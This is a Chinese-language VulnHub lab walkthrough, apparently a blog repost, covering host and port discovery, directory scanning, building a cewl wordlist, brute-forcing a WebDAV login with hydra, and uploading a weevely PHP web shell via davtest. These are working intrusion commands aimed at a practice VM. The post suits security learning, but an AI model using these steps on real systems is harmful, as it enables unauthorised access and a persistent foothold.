玩转vulnhub靶场

vulnhub是我们学习网络安全最常用的靶场之一。难易度适中,内容全面。是我们学习的不二选择。本文让我们一起学习吧!

声明:本文旨在网络安全学习和研究,坚决反对一切危害网络安全的行为。请务必遵守相关法律法规。

下载靶场

我们需要登录vulnhub官网对用的靶场。

玩转vulnhub靶场如上,涉及到的靶场还是比较多的,点击靶场后我们会看到相应的靶场环境介绍。

玩转vulnhub靶场下载靶场后,我们需要导入虚拟机,并启动即可!

玩转vulnhub靶场

前期信息收集

曾经大神说过:”渗透测试的本质是信息收集“。在运行虚拟机后,我们首先要进行收集一波信息。

😘主机IP地址

我们可以利用nmap masscan netdiscover等工具扫描扫描存活的主机IP

netdiscover -i eth0 -r 192.168.123.1/24
玩转vulnhub靶场

🐼扫描开放的端口

当我们得到了主机的IP信息后,接下来需要对主机开放的端口进行扫描。

nmap -T4 -A 192.168.123.89

玩转vulnhub靶场如上,我们只得到了22 80两个端口。相对来说开放的端口还是比较少的。

web扫描

通过对上面端口的扫描,我们只有两种方案,一种是通过80端口的web服务进行测试,另一方面就是暴力破解ssh了。相对于后者难度就大了。

🚵对web站点目录扫描

我们在用kali中自带的工具dirsearch进行目录扫描,看能否找到有用的信息。

dirsearch -u http://192.168.123.89/

玩转vulnhub靶场如上图,我们得到了webdav目录,通过webdav可以实现类似ftp文件传输的功能,但是利用的是web协议。

玩转vulnhub靶场通过弱口令登录无果。我们在次利用工具dirsearch对站点中的文件扫描,如php txt等文件

dirsearch -u http://192.168.123.89 -f -e txt

玩转vulnhub靶场通过本次扫描,我们发现了一个tips.txt文件。访问文件,内容如下:

玩转vulnhub靶场当时当我们访问creds.txt文件时,又提示文件不存在。

玩转vulnhub靶场这时,陷入了两难境地!我们要登录ssh需要账号和密码,而给出的提示文本访问时却提示不存在。通过查阅我们可以通过cewl工具生成专门针对于目标系统的密码字典。

cewl  http://192.168.123.89 -w dict.txt
玩转vulnhub靶场

🎶暴力破解webdav

hydra -L dict.txt -P dict.txt 192.168.123.89 http-get /webdav -v

玩转vulnhub靶场如上,我们成功得到了密码。登录webdav

玩转vulnhub靶场

🐇上传shell

我们先利用kali中自带的weevely工具生成php Shell

weevely generate 888888 /kali.php

通过davtest命令上传shell到服务器。

davtest -url http://192.168.123.89/webdav -auth yamdoot:Swarg -uploadfile kali.php -uploadloc kali2.php
  • -uploadfile表示指定上传的文件,
  • -uploadloc表示上传后的文件名 上传成功后,我们利用weevely登录系统。

玩转vulnhub靶场接下来,我们提权即可!

更多精彩文章 欢迎关注我们



原文始发于微信公众号(kali黑客笔记):玩转vulnhub靶场

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

文章由极客之音整理,本文链接:https://www.bmabk.com/index.php/post/152303.html

(0)
小半的头像小半

相关推荐

发表回复

登录后才能评论
极客之音——专业性很强的中文编程技术网站,欢迎收藏到浏览器,订阅我们!